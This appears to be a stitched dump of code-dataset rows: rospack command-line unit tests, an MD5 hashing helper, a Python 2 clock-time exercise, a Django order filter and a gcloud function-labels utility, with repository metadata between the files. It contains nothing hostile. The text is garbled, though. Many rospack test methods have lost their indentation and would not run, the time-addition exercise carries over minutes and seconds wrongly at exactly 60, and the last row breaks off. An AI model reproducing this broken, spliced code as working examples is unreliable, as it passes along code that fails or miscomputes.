    self.rospack_fail("base", "export --lang=cpp --attrib=")
    self.rospack_fail("base", "export --attrib=lflags")
    self.rospack_fail("base", "export --lang=cpp")
    # Each of --lang and --attrib may be given at most once.
    self.rospack_fail("base", "export --lang=cpp --lang=python --attrib=lflags")
    self.rospack_fail("base", "export --lang=cpp --attrib=lflags --attrib=cflags")
    self.rospack_fail("base", "export --lang=cpp --attrib=cflags --top=foo")
def test_plugins_bad(self):
    """'plugins' must reject missing --attrib and unsupported options."""
    self.rospack_fail("base", "plugins")
    self.rospack_fail("base", "plugins --lang=cpp")
    self.rospack_fail("base", "plugins --attrib=")
    self.rospack_fail("base", "plugins --top=foo")
def test_rosdep(self):
    """'rosdep' must report the package's own system dependency and, via
    'rosdep0'/'rosdep', the direct and transitive dependencies."""
    self.rospack_succeed("base", "rosdep")
    self.assertEquals("name: foo", self.run_rospack("base", "rosdep"))
    self.rospack_succeed("deps", "rosdep0")
    self.assertEquals("name: bar", self.run_rospack("deps", "rosdep0"))
    # 'rosdep' on 'deps' should include rosdeps of its dependencies too.
    self.check_unordered_list("rosdep", [(["name: foo", "name: bar"], "deps")])
################################################################################
## EXPORT
def test_export_cpp(self):
    """'export --lang=cpp' must return the lflags/cflags declared in the
    package manifest, independent of option order."""
    package = 'base'
    tests = [("-lfoo", "export --lang=cpp --attrib=lflags"),
             ("-lfoo", "export --attrib=lflags --lang=cpp"),
             ("-Isomething", "export --lang=cpp --attrib=cflags"),
             ("-Isomething", "export --attrib=cflags --lang=cpp"),
             ]
    for retval, arg in tests:
        self.rospack_succeed(package, arg)
        self.assertEquals(retval, self.strip_opt_ros(self.run_rospack(package, arg)))
    # --deps-only should export only the dependencies' flags, not 'deps' own.
    self.assertEquals("-lfoo -lbar", self.strip_opt_ros(self.run_rospack("deps", "export --lang=cpp --attrib=lflags --deps-only")))
    #TODO: test export with $prefix
def test_export_roslang(self):
package = 'base'
tests = [("something.cmake", "export --lang=roslang --attrib=cmake")]
for retval, arg in tests:
self.rospack_succeed(package, arg)
self.assertEquals(retval, self.strip_opt_ros(self.run_rospack(package, arg)))
def test_export_non_existent_attrib(self):
self.rospack_succeed("base", "export --lang=cpp --attrib=fake")
self.failIf(self.run_rospack("base", "export --lang=cpp --attrib=fake"))
################################################################################
## Plugins
def test_plugins(self):
tests = [(["deps foo.cmake", "plugins bat.cmake"], "base")]
self.check_unordered_list("plugins --attrib=cmake", tests)
package = 'base'
tests = [("deps foo.cmake", "plugins --attrib=cmake --top=deps")]
for retval, arg in tests:
self.rospack_succeed(package, arg)
self.assertEquals(retval, self.strip_opt_ros(self.run_rospack(package, arg)))
package = 'base_two'
tests = [("deps bar.cmake", "plugins --attrib=cmake")]
for retval, arg in tests:
self.rospack_succeed(package, arg)
self.assertEquals(retval, self.strip_opt_ros(self.run_rospack(package, arg)))
################################################################################
## ENVIRONMENT TEST
## test rospack with ROS_PACKAGE_PATH set
def test_ros_package_path(self):
testp = os.path.abspath('test')
tests = [
(["base", "base_two"], testp, "deps"),
]
self.echeck_ordered_list("deps", tests)
## tests internal rpp precedence (#2854)
def test_ros_package_path_precedence(self):
teste = os.path.abspath('test_empty')
testp = os.path.abspath('test')
test2p = os.path.abspath('test2')
testp_roslang = os.path.join(testp, 'roslang')
test2p_roslang = os.path.join(test2p, 'roslang')
tests = [([testp_roslang], teste + ':' + ':'.join([testp, test2p]), "roslang"),
([testp_roslang], teste + ':' + ':'.join([testp, test2p_roslang]), "roslang"),
([testp_roslang], teste + ':' + ':'.join([testp_roslang, test2p]), "roslang"),
([testp_roslang], teste + ':' + ':'.join([testp_roslang, test2p_roslang]), "roslang")]
self.echeck_unordered_list('find', tests)
## tests rpp vs rr precedence
def test_ros_package_path_precedence_1(self):
testp = os.path.abspath('test')
test2p = os.path.abspath('test2')
test3p = os.path.abspath('test3')
tests = [
(["test"], testp + ':' + test2p, "precedence1"),
(["test2"], test2p + ':' + testp, "precedence1"),
(["test2"], testp + ':' + "%s:%s"%(test2p, test3p), "precedence2"),
(["test3"], testp + ':' + "%s:%s"%(test3p, test2p), "precedence2"),
]
self.echeck_ordered_list('libs-only-l', tests)
## tests list-duplicates
def test_list_duplicates(self):
testp = os.path.abspath('test')
test2p = os.path.abspath('test2')
test3p = os.path.abspath('test3')
self.erospack_succeed(testp, None, 'list-duplicates')
self.erospack_succeed(testp + ':' + '%s:%s'%(test2p,test3p), None, 'list-duplicates')
# test ability to point ros_package_path directly at package
def test_ros_package_path_direct_package(self):
testp = os.path.abspath('test')
test2p = os.path.abspath('test2')
test3p = os.path.abspath('test3')
# point directly at precedence 2/3
rpp = ':'.join([os.path.join(test2p, 'precedence2'),os.path.join(test3p, 'precedence3')])
tests = [
(["test2"], testp + ':' + rpp, "precedence2"),
(["test3"], testp + ':' + rpp, "precedence3"),
]
self.echeck_ordered_list('libs-only-l', tests)
def test_ros_package_path_colons(self):
# scatter some colons into ros package path to make sure rospack doesn't mind
testp = os.path.abspath('test')
test2p = os.path.abspath('test2')
# Add a trailing slash, to make sure that it gets removed
test3p = os.path.abspath('test3') + '/'
tests = [
(["base","base_two"], testp + ':' + "::%s:::"%testp, "deps"),
(["base","base_two"], testp + ':' + "::", "deps"),
]
self.echeck_ordered_list('deps', tests)
tests = [
(["test"], testp + ':' + ":::%s:"%test2p, "precedence1"),
(["test2"],testp + ':' + "::%s::%s::"%(test2p,test3p), "precedence2"),
]
self.echeck_ordered_list("libs-only-l", tests)
def test_ros_package_path_bad_paths(self):
    """Non-existent entries on ROS_PACKAGE_PATH must be silently skipped.

    Lookups should still succeed using the valid path entries.
    """
    testp = os.path.abspath('test')
    test2p = os.path.abspath('test2')
    # BUG FIX: this previously was os.path.abspath('test'), i.e. an existing
    # directory identical to testp, so the test never actually exercised a
    # missing path entry.
    non_existentp = os.path.abspath('test_nonexistent_dir')
    tests = [
        (["test"], testp + ':' + non_existentp, "precedence1"),
        (["test2"],testp + ':' + ":%s:%s"%(non_existentp, test2p), "precedence2"),
        (["test2"],testp + ':' + ":%s:%s"%(test2p, non_existentp), "precedence2"),
    ]
    self.echeck_ordered_list("libs-only-l", tests)
# Test rospack from within a package
def test_ros_in_package(self):
pwd = os.getcwd()
rpp = os.path.join(pwd, 'test')
os.chdir(os.path.abspath(os.path.join('test', 'deps')))
self.erospack_succeed(rpp, None, 'depends1')
self.echeck_unordered_list('depends1', [(["base", "base_two"], rpp, None)])
# Check what happens when we're in an unlinked directory
d = tempfile.mkdtemp()
os.chdir(d)
os.rmdir(d)
self.erospack_fail(rpp, None, 'depends1')
os.chdir(pwd)
################################################################################
## rospack list
def _rospack_list(self, ros_package_path):
    """Run ``rospack list`` with ROS_PACKAGE_PATH forced to the given value
    (or removed from the environment when None).

    Returns (returncode, stripped-and-decoded stdout).
    """
    env = os.environ.copy()
    if ros_package_path is None:
        env.pop(ROS_PACKAGE_PATH, None)
    else:
        env[ROS_PACKAGE_PATH] = ros_package_path
    proc = Popen([ROSPACK_PATH, 'list'], stdout=PIPE, stderr=PIPE, env=env)
    output = proc.communicate()[0]
    return proc.returncode, output.strip().decode('ascii')
def _check_rospack_list(self, expected, retval):
    """Compare 'rospack list' output against an expected {package: path} dict."""
    # Each non-empty output line is "<package-name> <path>".
    lines = [l for l in retval.split('\n') if l]
    packages = [l[:l.find(' ')] for l in lines]
    # canonicalize paths
    paths = [os.path.abspath(l[l.find(' ')+1:]) for l in lines]
    result = {}
    for pack, path in zip(packages, paths):
        result[pack] = os.path.abspath(path)
    # Symmetric difference is empty iff both sides name exactly the same packages.
    self.failIf(set(expected.keys()) ^ set(packages), "package lists do not match (expected vs. actual): %s vs %s"%(expected.keys(), packages))
    # Every expected package must also resolve to the expected path.
    for pack,path in expected.items():
        self.assertEquals(path, result[pack])
## test rospack list on an empty tree
def test_rospack_list_empty(self):
rpp = os.path.abspath('test_empty')
retcode, retval = self._rospack_list(rpp)
self.assertEquals(0, retcode)
self.failIf(retval, "rospack list on empty directory returned value %s"%retval)
## test rospack depends-on1 in a directory that's not a package (#2556)
def test_rospack_depends_on_not_a_package(self):
pwd = os.getcwd()
rpp = os.path.abspath('test')
os.chdir(os.path.abspath('/'))
self.erospack_fail(rpp, None, 'depends-on1')
os.chdir(pwd)
# test that rospack list removes duplicates
def test_rospack_list_dups(self):
# make sure result is same if ROS_ROOT=ROS_PACKAGE_PATH
rpp = os.path.abspath('structure_test')
retcode, retval = self._rospack_list(rpp)
self.assertEquals(0, retcode)
def test_rospack_list_no_rpp(self):
rpp = os.path.abspath('structure_test')
expected = structure_test.copy()
retcode, retval = self._rospack_list(rpp)
self.assertEquals(0, retcode)
self._check_rospack_list(expected, retval)
#TODO: symlink test
#TODO: test with ros package path
################################################################################
## rospack list-names
def _rospack_list_names(self, ros_package_path):
    """Run ``rospack list-names`` with ROS_PACKAGE_PATH forced to the given
    value (or removed from the environment when None).

    Returns (returncode, stripped-and-decoded stdout).
    """
    env = os.environ.copy()
    if ros_package_path is None:
        env.pop(ROS_PACKAGE_PATH, None)
    else:
        env[ROS_PACKAGE_PATH] = ros_package_path
    proc = Popen([ROSPACK_PATH, 'list-names'], stdout=PIPE, stderr=PIPE, env=env)
    output = proc.communicate()[0]
    return proc.returncode, output.strip().decode('ascii')
## test rospack list-names on an empty tree
def test_rospack_list_names_empty(self):
rpp = os.path.abspath('test_empty')
retcode, retval = self._rospack_list_names(rpp)
self.assertEquals(0, retcode)
self.failIf(retval, "rospack list-names on empty directory returned value %s"%retval)
# test that rospack list removes duplicates
def test_rospack_list_names_dups(self):
# make sure result is same if ROS_ROOT=ROS_PACKAGE_PATH
rpp = os.path.abspath('structure_test')
retcode, retval = self._rospack_list_names(rpp)
self.assertEquals(0, retcode)
retcode2, retval2 = self._rospack_list_names(rpp)
self.assertEquals(0, retcode2)
self.assertEquals(retval, retval2, "rospack list-names did not remove duplicates")
def test_rospack_list_names_no_rpp(self):
rpp = os.path.abspath('structure_test')
expected = set(structure_test.copy().keys())
retcode, retval = self._rospack_list_names(rpp)
self.assertEquals(0, retcode)
self.assertEquals(expected, set(retval.split()))
#TODO: symlink test
#TODO: test with ros package path
################################################################################
## rospack find
## test rospack find on non-existent package
def test_rospack_find_fail(self):
rpp = os.path.abspath('test_empty')
self.erospack_fail(rpp, 'package', 'find')
## test rospack find with ros_package_path set directly to a package
def test_rospack_find_direct(self):
testp = os.path.abspath('test')
package1p = os.path.abspath(os.path.join('structure_test', 'package1'))
self.erospack_succeed(testp + ':' + package1p, 'package1', 'find')
self.assertEquals(package1p, self.erun_rospack(testp + ':' + package1p, 'package1', 'find'))
## test rospack find with ros_package_path set directly to a package,
## where that package contains a rospack_nosubdirs file, #3191.
def test_rospack_find_direct_with_rospack_nosubdirs(self):
testp = os.path.abspath('test')
package2p = os.path.abspath(os.path.join('structure_test', 'package2'))
self.erospack_succeed(testp + ':' + package2p, 'package2', 'find')
self.assertEquals(package2p, self.erun_rospack(testp + ':' + package2p, 'package2', 'find'))
def test_rospack_find_no_rpp(self):
rpp = os.path.abspath('structure_test')
expected = structure_test.copy()
for package,path in expected.items():
self.erospack_succeed(rpp, package, 'find')
self.assertEquals(path, os.path.abspath(self.erun_rospack(rpp, package, 'find')))
#TODO: symlink test
#TODO: test with ros package path
################################################################################
## DEPENDENCIES
def test_deps(self):
depth_list = ['depth-%s'%i for i in range(1, 101)]
depth_list.reverse()
tests = [
(["base","base_two"], "deps"),
(["base","base_two","deps"], "deps_higher"),
(["base","base_two","deps","deps_higher"],"deps_dup"),
(depth_list, "depth-0")
]
self.check_ordered_list('deps', tests)
def test_deps1(self):
tests = [
(["base","base_two"], "deps"),
(["deps"], "deps_higher"),
(["depth-1"], "depth-0"),
(["depth-99"], "depth-98"),
]
self.check_ordered_list('deps1',tests)
def test_deps_invalid(self):
self.rospack_fail("deps_invalid", "deps")
def test_depends_on(self):
depth_list = ['depth-%s'%i for i in range(0, 100)]
depth_list.reverse()
self.rospack_succeed("deps", "depends-on")
tests = [
(["plugins", "deps_dup", "deps", "deps_higher"], "base"),
(["deps_higher","deps_dup"], "deps"),
([], "depth-0"),
(depth_list, "depth-100"),
]
self.check_unordered_list("depends-on", tests)
def test_depends_on1(self):
# sanity check first
self.rospack_succeed("deps", "depends-on")
tests = [
(["deps_higher"], "deps"),
(["deps", "deps_dup", "plugins"], "base"),
(["deps", "deps_dup"], "base_two"),
]
self.check_unordered_list("depends-on1", tests)
def test_depends_on_nonexistent(self):
self.rospack_fail("deps", "deps_nonexistent")
self.rospack_fail("deps", "nonexistentpackage")
tests = [
(["deps_nonexistent"], "nonexistentpackage"),
]
self.check_ordered_list("depends-on", tests)
def test_lflags_base(self):
self.rospack_succeed("base", "libs-only-l")
self.assertEquals("foo", self.run_rospack("base", "libs-only-l"))
def test_circular(self):
    """Dependency cycles must make rospack fail rather than loop forever."""
    testp = os.path.abspath("test")
    cases = [("test_circular/cycle0", "self_ref", "deps"),
             ("test_circular/cycle1", "friend1", "deps"),
             ("test_circular/cycle1", "friend2", "deps"),
             ("test_circular/cycle2", "friend1", "deps"),
             ("test_circular/cycle2", "friend2", "deps"),
             ("test_circular/cycle2", "friend3", "deps"),
             ("test_circular/cycle2", "friend3", "depends-on")]
    for subdir, package, command in cases:
        self.erospack_fail(testp + ':' + os.path.abspath(subdir), package, command)
def test_lflags_backquote(self):
self.rospack_succeed("backquote", "libs-only-l")
self.assertEquals("loki foo backquote", self.run_rospack("backquote", "libs-only-l"))
def test_backquote_invalid(self):
self.rospack_fail("backquote_invalid", "libs-only-other")
# Strip out '/opt/ros' and friends from flags before checking them
def strip_opt_ros(self, flags):
    """Remove flags that point into the ROS install prefix.

    The prefix defaults to /opt/ros and is overridden by the
    ROS_BINDEPS_PATH environment variable. Bare lib/include paths as
    well as their -L/-I/-Wl,-rpath forms are dropped; remaining flags
    are re-joined with single spaces (empty tokens are discarded).
    """
    prefix = os.environ.get('ROS_BINDEPS_PATH', '/opt/ros')
    tostrip = [prefix + '/lib',
               prefix + '/include',
               '-L' + prefix + '/lib',
               '-I' + prefix + '/include',
               '-Wl,-rpath,' + prefix + '/lib']
    # Idiomatic rewrite of the manual accumulator loop: filter + join.
    return ' '.join(f for f in flags.split(' ') if f and f not in tostrip)
def test_Lflags_backquote(self):
self.rospack_succeed("backquote", "libs-only-L")
self.assertEquals("odin", self.strip_opt_ros(self.run_rospack("backquote", "libs-only-L")))
def test_cflags_backquote(self):
self.rospack_succeed("backquote", "cflags-only-I")
self.assertEquals("blah backquote", self.strip_opt_ros(self.run_rospack("backquote", "cflags-only-I")))
def test_cflags_platform_specific(self):
    """Exports guarded by platform conditions must match the build host OS."""
    self.rospack_succeed("platform_specific_exports", "cflags-only-other")
    myos = platform.system()
    if myos == 'Linux':
        self.assertEquals("-DLINUX", self.run_rospack("platform_specific_exports", "cflags-only-other"))
    elif myos == 'Darwin':
        self.assertEquals("-DAPPLE", self.run_rospack("platform_specific_exports", "cflags-only-other"))
    elif myos == 'Windows':
        self.assertEquals("-DWINDOWS", self.run_rospack("platform_specific_exports", "cflags-only-other"))
    else:
        self.assertEquals("-DOTHER", self.run_rospack("platform_specific_exports", "cflags-only-other"))
    # NOTE(review): the assertion below duplicates the one in
    # test_cflags_backquote and is unrelated to platform-specific exports;
    # it looks like a copy-paste leftover — confirm and consider removing.
    self.assertEquals("blah backquote", self.strip_opt_ros(self.run_rospack("backquote", "cflags-only-I")))
def test_lflags_archive(self):
self.rospack_succeed("lflags_with_archive_lib", "libs-only-l")
self.assertEquals("/usr/lib/libfoo.a", self.run_rospack("lflags_with_archive_lib", "libs-only-l"))
self.rospack_succeed("lflags_with_archive_lib", "libs-only-other")
self.assertEquals("/a/bad/flag", self.run_rospack("lflags_with_archive_lib", "libs-only-other"))
def test_lflags_deps(self):
self.rospack_succeed("deps", "libs-only-l")
self.assertEquals("loki foo bar", self.run_rospack("deps", "libs-only-l"))
def test_lflags_deps_only(self):
self.rospack_succeed("deps", "libs-only-l --deps-only")
self.assertEquals("foo bar", self.run_rospack("deps", "libs-only-l --deps-only"))
def test_empty_lflags(self):
tests = [([], "deps_empty")]
commands = ["libs-only-l", "libs-only-L", "libs-only-other"]
for c in commands:
self.check_ordered_list(c, tests)
def test_empty_cflags(self):
tests = [([], "deps_empty")]
commands = ["cflags-only-I", "cflags-only-other"]
for c in commands:
self.check_ordered_list(c, tests)
def test_empty_vcs(self):
self.rospack_succeed("empty", "vcs0")
self.assertEquals("type: \turl:", self.run_rospack("empty", "vcs0"))
self.rospack_succeed("deps_empty", "vcs")
self.assertEquals("type: svn\turl: \ntype: \turl:", self.run_rospack("deps_empty", "vcs"))
def test_vcs_no_type_or_url(self):
self.rospack_succeed("vc_no_type_or_url", "vcs0")
self.assertEquals("", self.run_rospack("vc_no_type_or_url", "vcs0"))
def test_lflags_no_package_attrib(self):
self.rospack_fail("no_package_attribute", "libs-only-l")
def test_lflags_invalid(self):
self.rospack_fail("invalid", "libs-only-l")
def test_vcs_invalid(self):
self.rospack_fail("invalid", "vcs")
def test_deps1_invalid(self):
self.rospack_fail("invalid", "deps1")
def test_vcs0_deps(self):
self.rospack_succeed("deps", "vcs0")
self.failIf(self.run_rospack("deps", "vcs0"))
def test_vcs_deps(self):
self.rospack_succeed("deps", "vcs")
self.assertEquals("type: svn\turl: https://ros.svn.sourceforge.net/svnroot/ros/trunk\n"+
"type: svn\turl: https://ros.svn.sourceforge.net/svnroot/ros/branches", self.run_rospack("deps", "vcs"))
def test_deps_manifests(self):
self.rospack_succeed("deps", "deps-manifests")
testp = os.path.abspath('test')
expected = os.path.join(testp, 'base/manifest.xml') + ' ' + os.path.join(testp, 'base_two/manifest.xml')
self.assertEquals(expected,
self.run_rospack("deps", "deps-manifests"))
def test_deps_indent(self):
self.rospack_succeed("deps_higher", "deps-indent")
testp = os.path.abspath('test')
expected = 'deps\n base\n base_two'
self.assertEquals(expected,
self.run_rospack("deps_higher", "deps-indent"))
def _rospack_langs(self, ros_package_path, ros_lang_disable):
    """Run ``rospack langs`` with ROS_PACKAGE_PATH and ROS_LANG_DISABLE
    forced to the given values (None removes the variable).

    Returns (returncode, stripped-and-decoded stdout).
    """
    env = os.environ.copy()
    for var, value in ((ROS_PACKAGE_PATH, ros_package_path),
                       (ROS_LANG_DISABLE, ros_lang_disable)):
        if value is None:
            env.pop(var, None)
        else:
            env[var] = value
    proc = Popen([ROSPACK_PATH, 'langs'], stdout=PIPE, stderr=PIPE, env=env)
    output = proc.communicate()[0]
    return proc.returncode, output.strip().decode('ascii')
def test_langs(self):
rpp = os.path.abspath('test')
retcode, retval = self._rospack_langs(rpp, None)
self.assertEquals(0, retcode)
# No guarantees on ordering of lang result
l = retval.split()
s = set(l)
expected = set(['rosfoo', 'rosbar'])
self.assertEquals(s, expected)
def test_langs_disable(self):
rpp = os.path.abspath('test')
disable = 'rosfoo'
retcode, retval = self._rospack_langs(rpp, disable)
self.assertEquals(0, retcode)
# No guarantees on ordering of lang result
l = retval.split()
s = set(l)
expected = set(['rosbar'])
self.assertEquals(s, expected)
def test_langs_empty(self):
rpp = os.path.abspath('test2')
retcode, retval = self._rospack_langs(rpp, None)
self.assertEquals(0, retcode)
self.failIf(retval, "rospack langs on empty directory returned value %s"%retval)
# Test auto-inclusion of msg_gen include directories, #3018
def test_msg_gen(self):
test_path = os.path.abspath('test')
pkgs = ['msg_gen_no_export', 'msg_gen_no_cpp', 'msg_gen_no_cflags']
for p in pkgs:
self.rospack_succeed(p, "cflags-only-I")
self.assertEquals(os.path.join(test_path, p, "msg_gen/cpp/include"), self.strip_opt_ros(self.run_rospack(p, "cflags-only-I")))
# Also test that we don't get auto-inclusion of msg_gen when we're
# asking for a different lang / attrib, #3884
pkg = 'msg_gen_no_cpp'
cmd = 'export --lang=cpp --attrib=lflags'
self.rospack_succeed(pkg, cmd)
self.assertEquals('', self.strip_opt_ros(self.run_rospack(pkg, cmd)))
cmd = 'export --lang=foo --attrib=bar'
self.rospack_succeed(pkg, cmd)
self.assertEquals('bat', self.run_rospack(pkg, cmd))
# Test that -q option suppresses errors, #3177.
def test_quiet_option(self):
rpp = os.path.abspath('test')
# With -q: look for non-existent package, make sure that it fails, yet
# produces nothing on stderr.
status_code, stdout, stderr = self._run_rospack(rpp, 'nonexistentpackage', 'find -q')
self.assertNotEquals(0, status_code)
self.assertEquals(0, len(stderr))
# Without -q: look for non-existent package, make sure that it fails,
# and produces somthing on stderr.
status_code, stdout, stderr = self._run_rospack(rpp, 'nonexistentpackage', 'find')
self.assertNotEquals(0, status_code)
self.assertNotEquals(0, len(stderr))
| [
"[email protected]"
] | |
a570f27a7c1170f47520d0fd62cc5ef08e71442c | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /all-gists/833679/snippet.py | 4ab198d900965b661dbb57b70023f8d4c2106db6 | [
"MIT"
] | permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 2,067 | py | #
# HashUtils - Simple functions derivated from standard Python hashlib.
#
__author__ = 'Mauro Baraldi ([email protected])'
__version__ = '0.0.2: February 17, 2011'
import re
import hashlib
from datetime import datetime
class Hash:
    """Common facilities built on the hashlib standard library.

    Algorithm used in all methods: MD5. Every method returns
    ``hashlib.md5(data).hexdigest()``.

    Example of use:

        >>> h = Hash()
        >>> h.string_hash("My name is Earl.")
        'ad05d8348194adf6d6190a2ae550e099'
        >>> h.from_date_hash((2001, 3, 1, 12, 45), '%Y/%m/%d %H:%M')
        'fc573499016722e5ff0747f2dc7f4971'
    """

    def __init__(self):
        pass

    def _md5(self, data):
        """Return the MD5 hexdigest of *data*.

        BUG FIX: hashlib.md5 requires bytes on Python 3, so str input is
        encoded transparently.
        """
        if isinstance(data, str):
            data = data.encode('utf-8')
        return hashlib.md5(data).hexdigest()

    def today_hash(self):
        """Return the hash of today's date formatted as %Y%m%d."""
        self.today = datetime.today().strftime('%Y%m%d')
        return self._md5(self.today)

    def now_hash(self):
        """Return the hash of the current timestamp formatted as %Y%m%d%H%M%S.

        BUG FIX: previously used '%Y%m%d', which contradicted this
        docstring and made now_hash() identical to today_hash().
        """
        self.today = datetime.today().strftime('%Y%m%d%H%M%S')
        return self._md5(self.today)

    def from_date_hash(self, date, strfmt):
        """Return the hash of the tuple *date* rendered through *strfmt*.

        The format's letters are replaced with %d placeholders so the raw
        tuple can be interpolated, parsed back via strptime, and then
        re-rendered canonically with strftime before hashing.
        """
        # BUG FIX: '[a-zA-z]' also matched punctuation between 'Z' and 'a'
        # ([\]^_`); restrict to actual ASCII letters.
        self.format = re.compile('[a-zA-Z]').sub('d', strfmt)
        self.build_date = datetime.strptime(self.format % date, strfmt)
        self.date = self.build_date.strftime(strfmt)
        return self._md5(self.date)

    def string_hash(self, string):
        """Return the hash of an arbitrary string."""
        return self._md5(string)

    def file_hash(self, fp, size=128):
        """Return the hash of the first *size* bytes of file *fp* (default 128).

        BUG FIX: open in binary read mode ('r+' required write permission
        and text mode made the digest platform-dependent), and return
        hexdigest() as the class docstring promises (previously returned
        the raw digest() bytes).
        """
        with open(fp, 'rb') as temp:
            return self._md5(temp.read(size))
| [
"[email protected]"
] | |
a5ba5bef1c1edc9aa06f3fe87232501307f1a1b2 | c61c9bedba1968bfaf571ac3996b696fc35890a6 | /Chapter16/16-3.py | ce29436d126c588d3560f122a3141296ca60d21e | [] | no_license | ArunRamachandran/ThinkPython-Solutions | 497b3dbdeba1c64924fe1d9aa24204a9ca552c5b | 1a0872efd169e5d39b25134960168e3f09ffdc99 | refs/heads/master | 2020-04-01T10:23:20.255132 | 2014-11-07T17:04:52 | 2014-11-07T17:04:52 | 25,806,318 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 652 | py | class Time(object):
''' to represent the time of a day '''
t1 = Time()
t2 = Time()
t1.h = 4
t1.m = 185
t1.s = 0
t2.h = 1
t2.m = 56
t2.s = 0
def add_time(t1,t2):
sum_time = Time()
sum_time.h = t1.h + t2.h
sum_time.m = t1.m + t2.m
sum_time.s = t1.s + t2.s
if sum_time.s > 60:
val = sum_time.s / 60
sum_time.s -= (60 * val)
sum_time.m += val
if sum_time.m > 60:
val_1 = sum_time.m / 60
sum_time.m -= (60 * val_1)
sum_time.h += val_1
print '%.2d:%.2d:%.2d' % (sum_time.h,sum_time.m,sum_time.s)
print "t1 ",
print '%.2d:%.2d:%.2d' % (t1.h, t1.m, t1.s)
print "t2 ",
print '%.2d:%.2d:%.2d' % (t2.h, t2.m, t2.s)
add_time(t1,t2)
| [
"[email protected]"
] | |
5e875e702c4451a5fc79d1144425698fbc263c61 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_twining.py | 87ddda74e438d11af092105cfd9569d7a62ef7c6 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py |
from xai.brain.wordbase.adjectives._twin import _TWIN
#calss header
class _TWINING(_TWIN):
    """Word entry for the adjective "twining".

    Inherits all behaviour from _TWIN and overrides only the identifying
    attributes of this record.
    """

    def __init__(self):
        _TWIN.__init__(self)
        self.name = "TWINING"
        self.specie = 'adjectives'
        self.basic = "twin"
        self.jsondata = {}
| [
"[email protected]"
] | |
e354add3beb18f533d7157be7068cbf4b7dd45db | 0b5b699459252996f058c8303a1f7093e7951ba0 | /food_delivery_app/restaurants/filters.py | 1c91e8a329ec67287390dbb43fe190d8aa8fe536 | [
"MIT"
] | permissive | MahmoudFarid/Food-Delivery-App | f145293548949618ae47d81f4ee7c35629fdaf5c | 8411ca48497e7347fe0258b720c2d2a566bb6e88 | refs/heads/master | 2020-04-12T04:40:22.129486 | 2018-12-23T21:52:09 | 2018-12-23T21:52:09 | 162,302,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | from django_filters import rest_framework as filters
from .models import Order
class OrderFilter(filters.FilterSet):
    """FilterSet allowing Order querysets to be filtered by customer and status."""

    class Meta:
        model = Order
        fields = ['customer', 'status']
| [
"[email protected]"
] | |
0964ca87b1476b689cf1f886a4e21864d6b7bb07 | d488f052805a87b5c4b124ca93494bc9b78620f7 | /google-cloud-sdk/.install/.backup/lib/googlecloudsdk/command_lib/functions/deploy/labels_util.py | 5e9da496f8ef33a5e94a3f93ad396421b5bf7ef7 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | PacktPublishing/DevOps-Fundamentals | 5ce1fc938db66b420691aa8106ecfb3f9ceb1ace | 60597e831e08325c7e51e8557591917f7c417275 | refs/heads/master | 2023-02-02T04:48:15.346907 | 2023-01-30T08:33:35 | 2023-01-30T08:33:35 | 131,293,311 | 13 | 19 | null | null | null | null | UTF-8 | Python | false | false | 2,718 | py | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""'functions deploy' utilities for labels."""
from googlecloudsdk.api_lib.functions import util as api_util
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.command_lib.util.args import labels_util as args_labels_util
NO_LABELS_STARTING_WITH_DEPLOY_MESSAGE = (
'Label keys starting with `deployment` are reserved for use by deployment '
'tools and cannot be specified manually.')
def CheckNoDeploymentLabels(flag_name, label_names):
  """Check for labels that start with `deployment`, which is not allowed.

  Args:
    flag_name: The name of the flag to include in case of an exception
    label_names: A list of label names to check (may be None or empty)

  Raises:
    calliope_exceptions.InvalidArgumentException
  """
  for label_name in label_names or []:
    if label_name.startswith('deployment'):
      raise calliope_exceptions.InvalidArgumentException(
          flag_name, NO_LABELS_STARTING_WITH_DEPLOY_MESSAGE)
def SetFunctionLabels(function, update_labels, remove_labels, clear_labels):
  """Set the labels on a function based on args.

  Args:
    function: the function to set the labels on
    update_labels: a dict of <label-name>-<label-value> pairs for the labels to
      be updated, from --update-labels
    remove_labels: a list of the labels to be removed, from --remove-labels
    clear_labels: a bool representing whether or not to clear all labels,
      from --clear-labels

  Returns:
    A bool indicating whether or not any labels were updated on the function.
  """
  # BUG FIX: copy instead of aliasing so the caller's --update-labels dict is
  # not mutated when the deployment-tool bookkeeping label is added.
  labels_to_update = dict(update_labels) if update_labels else {}
  labels_to_update['deployment-tool'] = 'cli-gcloud'
  labels_diff = args_labels_util.Diff(additions=labels_to_update,
                                      subtractions=remove_labels,
                                      clear=clear_labels)
  messages = api_util.GetApiMessagesModule()
  labels_update = labels_diff.Apply(messages.CloudFunction.LabelsValue,
                                    function.labels)
  if labels_update.needs_update:
    function.labels = labels_update.labels
    return True
  return False
| [
"[email protected]"
] | |
4374e0f6d09d3fac569ee903abba1a0b69fc1c4a | da7740e0d20dc7dd9775d4a53da7c0f7779834e1 | /MultiPlanarUNet/logging/logger.py | 4147e6a51aeb3f3ead32053006a4c39614f4c56e | [
"MIT"
